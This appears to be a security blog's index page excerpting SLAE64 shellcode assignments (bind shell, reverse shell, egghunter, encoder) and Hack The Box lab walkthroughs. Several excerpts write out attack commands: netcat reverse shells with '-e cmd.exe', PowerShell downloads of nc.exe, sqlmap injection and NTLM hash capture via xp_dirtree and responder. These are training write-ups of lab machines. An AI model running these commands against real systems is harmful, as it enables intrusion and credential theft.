This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert (SLAE64) certification: Student-ID: PA-15847 The Objectives for the Assignment: – create a custom encoding scheme like the Insertion Encoder– PoC with execve stack as the shellcode to encode with your scheme and execute So we used the following python… Continue reading SLAE64: Assignment 4 – Custom Encoder
Author: admin
SLAE64: Assignment 3 – Egghunters
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert (SLAE64) certification: Student-ID: PA-15847 The Objectives for the Assignment: study about egg hunter shellcodecreate a working demo of the egghuntershould be configurable for different payloads An Egg Hunter is the first stage of a multistage payload. It consists of… Continue reading SLAE64: Assignment 3 – Egghunters
SLAE64: Assignment 2 – Reverse Shell
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert (SLAE64) certification: Student-ID: PA-15847 The Objectives for the Assignment: create a shell_reverse_tcp shellcode: reverse connects to configured IP and port needs a passcode if passcode is correct, then execs shell remove 0x00 from bind tcp shellcode So I took… Continue reading SLAE64: Assignment 2 – Reverse Shell
SLAE64: Assignment 1 – Bind Shell
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert (SLAE64) certification: Student-ID: PA-15847 The Objectives for the Assignment: create a shell_bind_tcp shellcode binds to a port needs a passcode if passcode is correct, then execs shell remove 0x00 from bind tcp shellcode So I took the code… Continue reading SLAE64: Assignment 1 – Bind Shell
HTB – Arctic Walkthrough
nmap Port 8500 – ColdFusion ColdFusion File Inclusion Hash Crack JSP Shell Creation & File Upload & Shell Run the task and open the file on the following directory C:\ColdFusion8\wwwroot\CFIDE\shell.jsp Privilege escalation Python exploit suggester Upload ms10-059.exe (Chimchurri) via Powershell Get an admin shell with exe file .
HTB – NetMon Walkthrough
nmap Anonymous FTP PRTG Files are under C:\ProgramData\Paessler\PRTG Network Manager Looking for password The version of PRTG is vulnerable Use the following exploit: I got NT Authority\System
HTB – Tenten Walkthrough
nmap WPScan – enumerate users WPScan – Plugin Vulnerability (IDOR) found As the PoC explained in the above URL, I tried to upload CV files first Since wp saves the uploaded files as /wp-content/uplaods/{year}/{month}/{file name} I checked if the I uploaded exist, and yes it’s uploaded Also in HTML code of application page, I… Continue reading HTB – Tenten Walkthrough
HTB – Jeeves Walkthrough
nmap gobuster Jenkins Code Execution Create a project on Jenkins Low Privileged Shell Enter commands under Build Section Powershell wget “” -outfile “nc.exe” Nc.exe 7777 -e cmd.exe And listened on python SimpleHTTPServer to send the nc.exe file and started to listen on port 7777 with nc for a reverse shell Meterpreter Shell Create a… Continue reading HTB – Jeeves Walkthrough
HTB – Giddy Walkthrough
nmap gobuster Search field – SQL error SQL InjectionYou can use the cheatsheet of PentestMonkey you can use sqlmapsqlmap –url –dbms=mssql –dbs databases current usersqlmap –url –dbms=mssql –current-user Capture MSSQL credentials with xp_dirtree, smbserver.pyFollowing blogspost explains the process very good; EXEC MASTER.sys.xp_dirtree ‘\\yourIP\something’ listen with responder to steal the user hashresponder -I tun0… Continue reading HTB – Giddy Walkthrough
HTB – ChatterBox Walkthrough
nmap Exploit Create a shell with msfvenom as described in the exploit Get the exploit from searchsploit or exploitdb Shell Privilege Escalation reg query “HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon” (New-Object System.Net.WebClient).DownloadFile(‘’,’C:\Users\Alfred\Desktop\nc.exe’)$username = ‘administrator’$password = ‘Welcome1!’$securePassword = ConvertTo-SecureString $password -AsPlainText -Force$credential = New-Object System.Management.Automation.PSCredential $username, $securePasswordStart-Process C:\Users\Alfred\Desktop\nc.exe -ArgumentList ‘-e cmd.exe 1234’ -Credential $credential And we get an admin… Continue reading HTB – ChatterBox Walkthrough